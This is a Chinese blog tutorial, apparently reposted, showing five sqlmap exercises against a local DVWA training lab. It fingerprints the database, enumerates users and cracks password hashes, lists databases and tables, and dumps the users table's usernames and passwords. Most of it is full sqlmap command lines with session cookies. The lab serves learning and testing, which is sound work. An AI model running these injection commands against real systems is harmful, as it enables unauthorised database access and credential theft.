DVWA+SQLmap+Mysql注入实战

本文详细介绍使用SQLMap工具进行SQL注入攻击的五个实战案例,包括枚举数据库用户名与密码、枚举所有数据库、枚举指定数据库的数据表、获取指定数据库和表中所有列的信息,以及枚举指定数据表中的所有用户名与密码。

实战

        实战1:枚举登录MYSQL数据的用户名与密码

        实战2:枚举所有数据库

        实战3:枚举指定数据库的数据表

        实战4:获取指定数据库和表中所有列的信息

        实战5:枚举指定数据表中的所有用户名与密码

 

       环境准备:

       1)登录http://192.168.1.124/DVWA-1.9,将安全级别设置为最低;

 

       2)开启Firefox浏览器TamperData插件,等待获取cookies值;

 

       3)在【SQL Injection】项中,提交User ID为22(地址栏出现id=22,这就是MySQL的注入点)

             获得注入点:http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=22&Submit=Submit#

 

       4)TamperData弹窗获取cookies值:security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552

 

        

wKioL1ir7vqCmqKpAACBOlEPstQ897.png

 

wKiom1ir7xaQEBcYAABbjMUXB0w015.png

 

 

实战1:枚举登录MYSQL数据的用户名与密码

   sqlmap语法参数:

  • -u :指定目标URL,即注入点

  • --cookies:当前会话的cookies值

  • -b:获取数据库类型,检索数据库管理系统标识

  • --current-db:获取当前数据库

  • --current-user:获取当前登录数据库使用的用户

 

命令:

sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552' -b  --current-db  --current-user

 

说明:根据提示回复Y,继续

 

wKiom1ir73_DP8MFAABNbA9Svfw188.png

 

结果:得到当前数据库为dawa,使用的用户为root@localhost

 

wKioL1ir75iB4QDPAAA4GIZMCIU558.png

 

 

实战2:枚举所有数据库

   sqlmap语法参数:

  • --users:枚举数据库用户名

  • -password:枚举数据库用户的密码(hash)

     

   

命令:

sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552' --string="Surname" --users --password

wKioL1ir79DQPsHIAAAdqeK4hsY147.png

 

说明:选择目录下字典文件,暴力破解

 

wKioL1ir79zz1rl9AAAboWh7XLg480.png

 

结果:数据库用户名为root,密码也有明文形式123456

 

wKiom1ir7-igiyGKAAAj8h9xVlw598.png

 

 

实战3:枚举数据库和指定数据库的数据表

   sqlmap语法参数:

  • --dbs:枚举当前数据库

 

命令:

sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552' --string="Surname" --dbs

 

结果:mysql下所有的数据库

wKiom1ir8ALiZIK3AAAmjvflPbM786.png

 

命令:

sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552' --string="Surname" -D dvwa --tables

 

结果:dvwa库中,所有的表

wKiom1ir8BXA7lIhAAAjvpwDeGY232.png

 

实战4:获取指定数据库和表中所有列的信息

   sqlmap语法参数:

  • -D:指定的数据库

  • -T:指定数据库中的数据表

  • --columns:获取列的信息

 

命令:

sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552' --string="Surname" -D dvwa -T users --columns

 

结果:dvwa库,users表中所有字段信息

wKiom1ir8CeR8T6bAAA8TyLn2yA812.png

 

 

实战5:枚举指定数据表中的所有用户名与密码

   sqlmap语法参数:

  • -C:枚举数据表中的列

  • --dump:存储数据表项

 

命令:

sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552' --string="Surname" -D dvwa -T users -C user,password --dump

 

结果:dvwa库,users表中user字段和password字段信息,最后表中信息转存文件中

wKioL1ir8ECQtb0YAABIarDX3dw296.png

原文出处:https://blog.51cto.com/huangzp/1899871

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值